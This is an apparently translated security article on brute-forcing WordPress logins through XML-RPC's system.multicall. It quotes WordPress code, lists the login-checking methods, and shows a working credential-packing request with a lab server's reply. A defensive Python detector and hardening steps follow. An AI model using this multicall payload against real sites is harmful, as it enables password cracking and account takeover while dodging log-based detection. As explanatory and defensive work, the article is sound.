Analysis of the efficient brute-force cracking principle of WordPress via XMLRPC
XML-RPC is WordPress's remote-call interface, and using its methods for account brute-force cracking was proposed and exploited long ago. SUCURI recently published an article on using the system.multicall method of the XML-RPC interface to raise brute-force efficiency: thousands of account and password combinations can be packed into a single request, which greatly compresses the number of requests and, to a certain extent, evades log-based detection.
0x01 Principle Analysis
The code defining the XML-RPC service in WordPress is located mainly in wp-includes/class-IXR.php and wp-includes/class-wp-xmlrpc-server.php. The base class IXR_Server defines three built-in call methods: system.getCapabilities, system.listMethods, and system.multicall. The call mapping is located in the IXR_Server base class definition:
    function setCallbacks() {
        $this->callbacks['system.getCapabilities'] = 'this:getCapabilities';
        $this->callbacks['system.listMethods']     = 'this:listMethods';
        $this->callbacks['system.multicall']       = 'this:multiCall';
    }
When the base class is constructed, setCallbacks() is called to bind these call mappings:
    function __construct($callbacks = false, $data = false, $wait = false) {
        $this->setCapabilities();
        if ($callbacks) {
            $this->callbacks = $callbacks;
        }
        $this->setCallbacks(); // bind the default three basic call mappings
        if (!$wait) {
            $this->serve($data);
        }
    }
Let's take a look at the processing function behind system.multicall:
    function multiCall($methodcalls) {
        // See http://www.xmlrpc.com/discuss/msgReader$1208
        $return = array();
        foreach ($methodcalls as $call) {
            $method = $call['methodName'];
            $params = $call['params'];
            if ($method == 'system.multicall') {
                $result = new IXR_Error(-32600, 'Recursive calls to system.multicall are forbidden');
            } else {
                $result = $this->call($method, $params);
            }
            if (is_a($result, 'IXR_Error')) {
                $return[] = array(
                    'faultCode'   => $result->code,
                    'faultString' => $result->message
                );
            } else {
                $return[] = array($result);
            }
        }
        return $return;
    }
As the code shows, the server parses the XML carried by the request, iterates over every sub-call in the multicall and dispatches each one through call(), then returns all of the results together to the requesting client.
In this way, 500 or even 10000 account and password combinations can be packed into a single request. The server finishes processing them quickly and returns the results, which greatly improves brute-force efficiency: the multicall interface compresses the number of requests. An attempt covering 10000 credential pairs leaves only one entry in the target server's access log, which to a certain extent evades log-based security detection.
Reading the XML-RPC code in WordPress shows that a large number of XML-RPC methods verify the user name and password with the following check:
if ( !$user = $this->login($username, $password) ) return $this->error;
Searching for the preceding login check yields the list of all methods that can be used for brute-force cracking:
wp.getUsersBlogs, wp.newPost, wp.editPost, wp.deletePost, wp.getPost, wp.getPosts, wp.newTerm, wp.editTerm, wp.deleteTerm, wp.getTerm, wp.getTerms, wp.getTaxonomy, wp.getTaxonomies, wp.getUser, wp.getUsers, wp.getProfile, wp.editProfile, wp.getPage, wp.getPages, wp.newPage, wp.deletePage, wp.editPage, wp.getPageList, wp.getAuthors, wp.getTags, wp.newCategory, wp.deleteCategory, wp.suggestCategories, wp.getComment, wp.getComments, wp.deleteComment, wp.editComment, wp.newComment, wp.getCommentStatusList, wp.getCommentCount, wp.getPostStatusList, wp.getPageStatusList, wp.getPageTemplates, wp.getOptions, wp.setOptions, wp.getMediaItem, wp.getMediaLibrary, wp.getPostFormats, wp.getPostType, wp.getPostTypes, wp.getRevisions, wp.restoreRevision, blogger.getUsersBlogs, blogger.getUserInfo, blogger.getPost, blogger.getRecentPosts, blogger.newPost, blogger.editPost, blogger.deletePost, mw.newPost, mw.editPost, mw.getPost, mw.getRecentPosts, mw.getCategories, mw.newMediaObject, mt.getRecentPostTitles, mt.getPostCategories, mt.setPostCategories
Here we test with wp.getUsersBlogs, whose parameters are the simplest and which most directly returns information. Two account and password attempts are packed into the same request, and the XML request body is constructed as follows:
    <?xml version="1.0"?>
    <methodCall>
      <methodName>system.multicall</methodName>
      <params><param><value><array><data>
        <value><struct>
          <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
          <member><name>params</name><value><array><data>
            <value><string>admin</string></value>
            <value><string>admin888</string></value>
          </data></array></value></member>
        </struct></value>
        <value><struct>
          <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
          <member><name>params</name><value><array><data>
            <value><string>guest</string></value>
            <value><string>test</string></value>
          </data></array></value></member>
        </struct></value>
      </data></array></value></param></params>
    </methodCall>
Send the preceding XML request containing two sub-calls to the server's xmlrpc.php entry point. If the XML-RPC service is enabled, the following is returned:
    <?xml version="1.0" encoding="UTF-8"?>
    <methodResponse>
      <params><param><value><array><data>
        <value><array><data>
          <value><array><data>
            <value><struct>
              <member><name>isAdmin</name><value><boolean>1</boolean></value></member>
              <member><name>url</name><value><string>http://172.16.96.130/xampp/wordpress-4.3.1/</string></value></member>
              <member><name>blogid</name><value><string>1</string></value></member>
              <member><name>blogName</name><value><string>WordPress 4.3.1</string></value></member>
              <member><name>xmlrpc</name><value><string>http://172.16.96.130/xampp/wordpress-4.3.1/xmlrpc.php</string></value></member>
            </struct></value>
          </data></array></value>
        </data></array></value>
        <value><struct>
          <member><name>faultCode</name><value><int>403</int></value></member>
          <member><name>faultString</name><value><string>The user name or password is incorrect.</string></value></member>
        </struct></value>
      </data></array></value></param></params>
    </methodResponse>
The results show that the two account and password combinations were processed within the same request and their results returned together. In this way, the efficiency of account brute-force cracking is greatly improved.
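Because a multicall leaves a single access-log line however many passwords it checks, a defender has to look inside the request body. The following Python is an added example (not code from the original article or from WordPress) that parses a captured xmlrpc.php POST body, counts the sub-calls that hit login()-requiring methods, and flags a request that carries more than one distinct user/password pair; the sample body is constructed to match the two-attempt request above, and LOGIN_METHODS holds only a subset of the method list given earlier.

```python
# Added example, not code from the original article or from WordPress: inspect a POST
# body captured for xmlrpc.php and count the password checks one request triggers,
# since the access log records only one line per request. Sample body is constructed.
import xml.etree.ElementTree as ET

# Subset of the login()-calling methods the article lists; extend for real use.
LOGIN_METHODS = {"wp.getUsersBlogs", "wp.getUsers", "wp.getProfile",
                 "wp.newPost", "wp.getPosts", "blogger.getUsersBlogs"}

def _decode(value):
    """Decode an XML-RPC <value> element into a Python object (common types)."""
    child = next(iter(value), None)
    if child is None:                          # untyped <value>text</value> is a string
        return (value.text or "").strip()
    if child.tag == "array":
        return [_decode(v) for v in child.findall("data/value")]
    if child.tag == "struct":
        return {m.findtext("name"): _decode(m.find("value"))
                for m in child.findall("member")}
    if child.tag in ("int", "i4", "boolean"):
        return int(child.text)
    return (child.text or "").strip()          # string, dateTime, base64, ...

def inspect_xmlrpc_body(body):
    """Summarise how many login checks and credential sets one request carries."""
    root = ET.fromstring(body)
    top = root.findtext("methodName")
    if top == "system.multicall":              # sub-calls arrive as structs in an array
        calls = [c for c in _decode(root.find("params/param/value")) if isinstance(c, dict)]
    else:                                      # a plain call is a single attempt
        calls = [{"methodName": top,
                  "params": [_decode(v) for v in root.findall("params/param/value")]}]
    login_calls = [c for c in calls if c.get("methodName") in LOGIN_METHODS]
    # Distinct tuples of string params approximate distinct credential sets: a normal
    # client reuses one user/password pair across sub-calls, a brute-force run varies it.
    cred_sets = {tuple(p for p in c.get("params", []) if isinstance(p, str))
                 for c in login_calls}
    return {"top_method": top, "sub_calls": len(calls), "login_calls": len(login_calls),
            "distinct_credential_sets": len(cred_sets), "suspicious": len(cred_sets) > 1}

# Constructed sample: the article's two-attempt multicall (admin/admin888, guest/test).
SAMPLE_MULTICALL = """<?xml version="1.0"?><methodCall><methodName>system.multicall</methodName>
<params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>admin</string></value>
<value><string>admin888</string></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data><value><string>guest</string></value>
<value><string>test</string></value></data></array></value></member></struct></value>
</data></array></value></param></params></methodCall>"""
```

Running inspect_xmlrpc_body(SAMPLE_MULTICALL) reports two sub-calls, two login checks and two distinct credential sets, so the request is flagged, while a single wp.getUsersBlogs call with one pair is not.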
0x02 Protection Suggestions
This problem still exists in the latest WordPress version (4.3.1). Multicall (system.multicall) is part of the XML-RPC standard. To prevent attackers from using it to launch brute-force attacks against a site, the following protection suggestions are offered:
1. Configure the web server (Apache, Nginx, etc.) to restrict access to the xmlrpc.php file; if the site does not need XML-RPC, the xmlrpc.php file can also be deleted without affecting website operation.
2. Install and enable the Disable XML-RPC plug-in from the official plug-in directory.
3. Add the following code to the WordPress configuration file wp-config.php:
       add_filter('xmlrpc_enabled', '__return_false');